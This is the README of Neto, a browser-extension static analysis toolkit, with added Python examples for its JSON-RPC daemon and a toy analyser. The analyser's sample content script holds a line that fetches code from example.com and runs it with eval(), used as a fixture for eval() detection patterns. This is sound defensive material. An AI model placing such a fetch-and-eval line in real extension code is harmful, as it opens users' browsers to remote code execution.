Neto | A tool to analyse browser extensions

Project Neto: A Toolkit for Analysing Browser Plugins


Project Neto is a Python 3 package conceived to analyse and unravel hidden features of browser plugins and extensions for well-known browsers such as Firefox and Chrome. It automates the process of unzipping the packaged files to extract these features from relevant resources in an extension, such as manifest.json, localization folders, or JavaScript and HTML source files.


To install the package, the user can use pip3:

pip3 install -e . --user

Optionally, it can also be installed with administrator privileges using sudo:

sudo pip3 install -e .

A successful installation can be checked using:

python3 -c "import neto; print(neto.__version__)"

Quick Start

To perform the analysis of an extension, the analyst can type the following:

neto analysis -u

The extension will be automatically downloaded and unzipped, by default into the system's temporary folder.

However, the analyst can also launch the analysis against a locally stored extension:

neto analysis -e ./my-extension-name.xpi

After the static analysis is performed, it will generate a JSON file that is stored by default in a newly created folder named output.

If you use Python, you can also import the package as a library in your own Python modules:

>>> from neto.lib.extensions import Extension
>>> my_extension = Extension("./sample.xpi")
>>> my_extension.filename
>>> my_extension.digest

Apart from accessing the elements found in the extension through properties, the analyst can always access them as a dictionary:

>>> my_extension.__dict__
{'_analyser_version': '0.0.1', '_digest': '849ec142a8203da194a73e773bda287fe0e830e4ea59b501002ee05121b85a2b'…

If you are not using Python, you can use the JSON RPC daemon:

$ neto daemon

         ____            _           _      _   _      _
        |  _ \ _ __ ___ (_) ___  ___| |_   | \ | | ___| |_ ___
        | |_) | '__/ _ \| |/ _ \/ __| __|  |  \| |/ _ \ __/ _ \ 
        |  __/| | | (_) | |  __/ (__| |_   | |\  |  __/ || (_) |
        |_|   |_|  \___// |\___|\___|\__|  |_| \_|\___|\__\___/

                                    Developed by @ElevenPaths
                                    Version: 0.5.0b

 * Running on http://localhost:14041/ (Press CTRL+C to quit)

You can then run commands using your preferred JSON RPC library to write a client (we have written a short demo in the bin folder) or even curl:

 curl --data-binary '{"id":0, "method":"remote", "params":[""], "jsonrpc": "2.0"}'  -H 'content-type:text/json;' http://localhost:14041
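The curl call above is a JSON-RPC 2.0 request, and the daemon's reply follows the same envelope (a `jsonrpc` version, an `id` echoing the request, and exactly one of `result` or `error`). The client below is an added example, not the demo client shipped in the project's bin folder: it builds the request, validates the response envelope strictly, and lets the transport be swapped so the validation logic can be exercised offline. The method name `remote` and port 14041 come from the README; that the single parameter is an extension URL is an assumption, and the daemon's actual result format is not documented here, so the result is returned as-is.

```python
"""Minimal JSON-RPC 2.0 client for the neto daemon (added example).

Not the project's own client. Assumptions: the daemon listens on the
README's port 14041, exposes a method named "remote", and that the
single parameter is an extension URL; the shape of "result" is unknown
and is passed through untouched.
"""
import json
import urllib.request

DAEMON_URL = "http://localhost:14041"


def build_request(method: str, params: list, req_id: int) -> bytes:
    """Serialize one JSON-RPC 2.0 request; the id lets us match the reply."""
    return json.dumps(
        {"jsonrpc": "2.0", "id": req_id, "method": method, "params": params}
    ).encode("utf-8")


def parse_response(body: bytes, expected_id: int):
    """Validate the JSON-RPC 2.0 envelope before trusting anything in it."""
    try:
        msg = json.loads(body)
    except ValueError as exc:
        raise ValueError("daemon returned a non-JSON body") from exc
    if not isinstance(msg, dict) or msg.get("jsonrpc") != "2.0":
        raise ValueError("not a JSON-RPC 2.0 response")
    if msg.get("id") != expected_id:
        # A reply for a different request must never be attributed to ours.
        raise ValueError(
            f"response id {msg.get('id')!r} does not match request id {expected_id!r}"
        )
    if ("result" in msg) == ("error" in msg):
        raise ValueError("response must carry exactly one of 'result' or 'error'")
    if "error" in msg:
        err = msg["error"] if isinstance(msg["error"], dict) else {}
        raise RuntimeError(f"daemon error {err.get('code')}: {err.get('message')}")
    return msg["result"]


def http_transport(url: str, payload: bytes) -> bytes:
    """POST the payload to the daemon. The README's curl example sends
    text/json; application/json is the registered media type for JSON."""
    req = urllib.request.Request(
        url, data=payload, headers={"Content-Type": "application/json"}, method="POST"
    )
    with urllib.request.urlopen(req, timeout=30) as resp:
        return resp.read()


def constructed_transport(url: str, payload: bytes) -> bytes:
    """Constructed stand-in for the daemon, used to exercise the client
    offline: answers "remote" with a made-up result and anything else
    with the standard 'method not found' error (-32601)."""
    req = json.loads(payload)
    if req["method"] == "remote":
        reply = {"jsonrpc": "2.0", "id": req["id"],
                 "result": {"analysed": req["params"][0], "digest": "<constructed>"}}
    else:
        reply = {"jsonrpc": "2.0", "id": req["id"],
                 "error": {"code": -32601, "message": "Method not found"}}
    return json.dumps(reply).encode("utf-8")


def call(method: str, params: list, req_id: int = 0,
         transport=http_transport, url: str = DAEMON_URL):
    """Send one request and return the validated result."""
    return parse_response(transport(url, build_request(method, params, req_id)), req_id)


if __name__ == "__main__":
    # Against a running daemon: call("remote", ["https://example.com/ext.xpi"])
    print(call("remote", ["https://example.com/ext.xpi"], 1, transport=constructed_transport))
```

The id check and the result/error exclusivity check are the parts worth keeping in any real client: a daemon reply that fails them should be treated as a protocol error, not silently unpacked.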


The following is a non-exhaustive list of the features included in this package:

  • Manifest analysis.
  • Internal file hashing.
  • Entities extraction using regular expressions: IPv4, email, cryptocurrency addresses, URL, etc.
  • Comments extraction from HTML, CSS and JS files.
  • Cryptojacking detection engine based on known mining domains and expressions.
  • Suspicious JavaScript code detection such as eval().
  • Certificate analysis if provided.
  • Batch analysis of previously downloaded extensions.
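To make the static-analysis steps in the list concrete (unzipping the package, hashing internal files, reading the manifest, extracting entities with regular expressions, pulling comments out of JS, and flagging eval()), here is an added example that implements a toy version of that pipeline. It is not Neto's code and does not use its API; the extension archive is constructed in memory so the whole thing runs offline, and every pattern in it is a simplified stand-in for the project's own (undocumented here) rule set.

```python
"""Toy static analysis of a packaged browser extension (added example).

Not Neto's own code. The archive analysed below is constructed inline;
the regular expressions are illustrative, not the project's rules.
"""
import hashlib
import io
import json
import re
import zipfile

# A few of the entity types the feature list names.
ENTITY_PATTERNS = {
    "ipv4": re.compile(
        r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b"
    ),
    "email": re.compile(r"\b[\w.+-]+@[\w-]+(?:\.[\w-]+)+\b"),
    "url": re.compile(r"https?://[^\s'\"<>]+"),
}

# Code constructs worth a second look; eval() is the one the README names.
SUSPICIOUS_JS = {
    "eval": re.compile(r"\beval\s*\("),
    "new_function": re.compile(r"\bnew\s+Function\s*\("),
}

# Block comments and line comments in JS/CSS. The lookbehind keeps the "//"
# of a URL such as https://... from being read as a comment; a real tool
# would tokenise instead of using a regex.
JS_COMMENT = re.compile(r"/\*.*?\*/|(?<!:)//[^\n]*", re.S)


def build_sample_xpi() -> bytes:
    """Constructed sample extension: a zip archive, as .xpi/.crx payloads are."""
    manifest = {
        "manifest_version": 2,
        "name": "Sample Extension",
        "version": "1.0",
        "permissions": ["tabs", "<all_urls>", "storage"],
        "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"]}],
    }
    content_js = (
        "// constructed content script\n"
        "var cfg = {host: '203.0.113.10', contact: 'ops@example.com'};\n"
        "fetch('https://example.com/update.json').then(r => r.text()).then(code => eval(code));\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("manifest.json", json.dumps(manifest))
        zf.writestr("content.js", content_js)
    return buf.getvalue()


def analyse_extension(package: bytes) -> dict:
    """Unzip the package and collect manifest facts, hashes, entities, comments and findings."""
    report = {
        "digest": hashlib.sha256(package).hexdigest(),  # hash of the whole package
        "files": {}, "manifest": {}, "entities": {}, "comments": [], "suspicious": [],
    }
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        for name in zf.namelist():
            data = zf.read(name)
            report["files"][name] = hashlib.sha256(data).hexdigest()  # per-file hash
            if name == "manifest.json":
                manifest = json.loads(data)
                report["manifest"] = {
                    "name": manifest.get("name"),
                    "permissions": manifest.get("permissions", []),
                    "content_script_matches": [
                        m for cs in manifest.get("content_scripts", []) for m in cs.get("matches", [])
                    ],
                }
                continue
            text = data.decode("utf-8", errors="replace")
            for kind, pattern in ENTITY_PATTERNS.items():
                for match in pattern.findall(text):
                    report["entities"].setdefault(kind, set()).add(match)
            if name.endswith((".js", ".css")):
                report["comments"].extend(c.strip() for c in JS_COMMENT.findall(text))
            if name.endswith(".js"):
                for label, pattern in SUSPICIOUS_JS.items():
                    for m in pattern.finditer(text):
                        line = text.count("\n", 0, m.start()) + 1
                        report["suspicious"].append({"file": name, "finding": label, "line": line})
    report["entities"] = {k: sorted(v) for k, v in report["entities"].items()}
    return report


if __name__ == "__main__":
    print(json.dumps(analyse_extension(build_sample_xpi()), indent=2))
```

The report pairs each finding with its file and line so an analyst can go straight to the code in question; the broad `<all_urls>` permission together with a remote fetch feeding eval() is exactly the combination this kind of triage is meant to surface for manual review.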